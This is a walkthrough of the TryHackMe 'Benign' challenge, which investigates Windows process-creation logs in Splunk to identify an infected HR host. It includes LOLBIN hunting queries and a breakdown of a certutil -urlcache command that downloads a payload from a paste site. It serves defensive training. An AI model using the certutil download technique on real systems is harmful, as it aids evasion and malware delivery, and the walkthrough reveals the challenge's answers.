TryHackMe - Benign Walkthrough
We will investigate host-centric logs in this challenge room to find suspicious process execution. To learn more about Splunk and how to investigate the logs, look at the rooms splunk101 and splunk201.
To benign or not benign?
Badge Unlocked
Introduction
We will investigate host-centric logs in this challenge room to find suspicious process execution. To learn more about Splunk and how to investigate the logs, look at the rooms splunk101 and splunk201.
Before moving forward, deploy the machine. When you deploy the machine, it will be assigned an IP. Access this room via the AttackBox, or via the VPN at MACHINE_IP. The machine will take up to 3-5 minutes to start. ll the required logs are ingested in the index win_eventlogs.
Scenario: Identify and Investigate an Infected Host
One of the client’s IDS indicated a potentially suspicious process execution indicating one of the hosts from the HR department was compromised. Some tools related to network information gathering / scheduled tasks were executed which confirmed the suspicion. Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index win_eventlogs for further investigation.
About the Network Information
The network is divided into three logical segments. It will help in the investigation.
IT Department
- James
- Moin
- Katrina
HR department
- Haroon
- Chris
- Diana
Marketing department
- Bell
- Amelia
- Deepak
Questions
Q1. How many logs are ingested from the month of March, 2022?
A: Set the “Date Range” from 03/01/2022 - 03/31/2022, next set the index to win_eventlogs or * and search.
index=*
Q2. Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?
A: For this query I’ve used the top and tablecommands to return the most frequent values for the UserName field and to display a structured table with only the specified fields: UserName, HostName, CommandLine, and EventID.
index=*
| search HostName="*"
| top limit=100 UserName | table UserName HostName CommandLine EventID
Q3. Which user from the HR department was observed to be running scheduled tasks?
A: For this query I've filtered all users from HR that had the term "schtasks" in the CommandLine field.
index=*
| search HostName="HR*" AND schtasks
| table _time UserName HostName CommandLine EventID
Q4. Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host.
A: I had to do a bit of research as to which LOLBIN (Live Off The Land Binaries) are commonly used for downloading data. (For the next few questions I will continue to use the same query)
index=* sourcetype=* OR sourcetype=*
| search CommandLine="*bitsadmin*"
OR CommandLine="*certutil*"
OR CommandLine="*powershell*"
OR CommandLine="*mshta*"
OR CommandLine="*rundll32*"
OR CommandLine="*curl*"
OR CommandLine="*wget*"
| search HostName="HR*"
| table _time UserName HostName CommandLine ParentProcessName EventID
| sort _time
Q5. To bypass the security controls, which system process (LOLBIN) was used to download a payload from the internet?
A: Let's breakdown the command being used in the screenshot:
-
certutil.exe:- Certutil is a built-in Windows utility used to manage certificates and perform various cryptographic tasks.
- In this case, it is being used to download a file from the internet, which is an unusual use of the utility and often seen in malicious activities (e.g., downloading malware).
-
-urlcache:- This switch tells
certutilto work with URL cache (the HTTP caching mechanism). Specifically, it is used here to fetch a file from a remote URL.
- This switch tells
-
-f:- The
-foption forces the overwrite of any existing file with the same name. If a file with the same name already exists on the disk, it will be replaced without prompting.
- The
-
-(hyphen):- This is used in conjunction with the
-urlcacheoption, specifying thatcertutilshould download the file rather than just caching the URL.
- This is used in conjunction with the
-
https://controlc.com/e4d11035:- This is the URL from which
certutilis downloading the file. The URL points to a file hosted oncontrolc.com, which is a pastebin-like service. The exact file being downloaded is determined by the content hosted at this URL.
- This is the URL from which
-
benign.exe:- This is the output file name. The file downloaded from the URL will be saved locally as
benign.exe. Despite the name suggesting that it is "benign," there is no guarantee that the file is harmless.
- This is the output file name. The file downloaded from the URL will be saved locally as
index=* sourcetype=* OR sourcetype=*
| search CommandLine="*bitsadmin*"
OR CommandLine="*certutil*"
OR CommandLine="*powershell*"
OR CommandLine="*mshta*"
OR CommandLine="*rundll32*"
OR CommandLine="*curl*"
OR CommandLine="*wget*"
| table _time UserName HostName CommandLine ParentProcessName EventID
| sort _time
Q6. What was the date that this binary was executed by the infected host? format (YYYY-MM-DD)
A: _time displays the time that event occured.
index=* sourcetype=* OR sourcetype=*
| search CommandLine="*bitsadmin*"
OR CommandLine="*certutil*"
OR CommandLine="*powershell*"
OR CommandLine="*mshta*"
OR CommandLine="*rundll32*"
OR CommandLine="*curl*"
OR CommandLine="*wget*"
| table _time UserName HostName CommandLine ParentProcessName EventID
| sort _time
Q7. Which third-party site was accessed to download the malicious payload?
A: This answer can be find under the CommandLine section.
Q8. What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?
A: The answer to this question can also be found under the CommandLine section as well.
Q9. The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?
A: Head to the URL found in the CommandLine section, but before doing so make sure you make sure to double check the URL on VirusTotal before proceeding or visit the URL in the THM AttackBox or Browserling. After navigating to the URL you will find the answer to the question.
Q10. What is the URL that the infected host connected to?
A: The URL can be found in the CommandLine section of the event.
Let's Connect!
